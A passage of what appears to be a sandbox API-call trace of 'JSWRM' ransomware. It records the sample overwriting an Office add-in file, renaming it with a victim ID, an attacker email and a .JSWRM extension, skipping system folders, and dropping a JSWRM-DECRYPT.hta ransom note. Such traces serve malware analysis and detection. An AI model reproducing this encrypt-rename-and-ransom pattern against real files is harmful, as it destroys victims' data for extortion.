HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.de.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0123.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.de.xap", cchWideChar=19, lpMultiByteStr=0x2412e0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.de.xap", lpUsedDefaultChar=0x0) returned 19 [0123.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0123.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0123.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0123.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\de\\PowerViewRes.de.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\de\\powerviewres.de.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.783] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=328441) returned 1 [0123.783] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0123.783] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0123.797] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.797] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0123.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.798] CloseHandle (hObject=0x338) returned 1 [0123.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0123.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0123.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0123.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0123.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0123.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0123.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0123.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.798] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\de\\PowerViewRes.de.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\de\\powerviewres.de.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\de\\PowerViewRes.de.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\de\\powerviewres.de.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0123.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0123.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0123.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0123.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0123.799] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133f40a9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133f40a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x502f9, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.de.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0123.799] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0123.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0123.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0123.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0123.800] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf46b8986, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0123.801] lstrcmpiW (lpString1="el", lpString2=".") returned 1 [0123.801] lstrcmpiW (lpString1="el", lpString2="..") returned 1 [0123.801] lstrcmpiW (lpString1="el", lpString2="...") returned 1 [0123.801] lstrcmpiW (lpString1="el", lpString2="windows") returned -1 [0123.801] lstrcmpiW (lpString1="el", lpString2="recovery") returned -1 [0123.801] lstrcmpiW (lpString1="el", lpString2="perflogs") returned -1 [0123.801] lstrcmpiW (lpString1="el", lpString2="documents and settings") returned 1 [0123.801] lstrcmpiW (lpString1="el", lpString2="$RECYCLE.BIN") returned 1 [0123.801] lstrcmpiW (lpString1="el", lpString2="system volume information") returned -1 [0123.801] lstrcmpiW (lpString1="el", lpString2="msocache") returned -1 [0123.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0123.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0123.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0123.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0123.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0123.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0123.801] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\el\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\el\\jswrm-decrypt.hta")) returned 0xffffffff [0123.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0123.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0123.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0123.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0123.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0123.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0123.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0123.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\el\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\el\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0123.804] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.804] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0123.805] CloseHandle (hObject=0x314) returned 1 [0123.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0123.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0123.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0123.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0123.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0123.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0123.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0123.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0123.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0123.805] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\el\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\el\\jswrm-decrypt.hta")) returned 0x20 [0123.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0123.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0123.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0123.805] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\el\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf46b8986, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x407415a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0123.805] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.805] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf46b8986, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x407415a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0123.805] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.805] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.805] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf46b8986, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf46b8986, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc5240, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0123.805] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0123.805] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0123.805] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0123.805] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0123.805] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0123.805] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0123.806] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0123.806] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.806] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0123.806] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0123.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0123.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0123.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0123.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0123.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241010, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0123.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0123.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0123.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0123.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.806] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x407415a8, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x407415a8, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x407415a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.806] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.806] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.806] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.806] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.806] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.806] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.806] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.806] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.806] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.806] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0123.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0123.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0123.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0123.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0123.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0123.807] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80afe67, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80afe67, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80afe67, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1b040, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.807] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0123.807] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0123.807] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0123.807] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0123.807] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0123.807] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0123.807] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0123.807] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.807] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0123.807] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0123.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0123.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0123.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0123.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0123.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 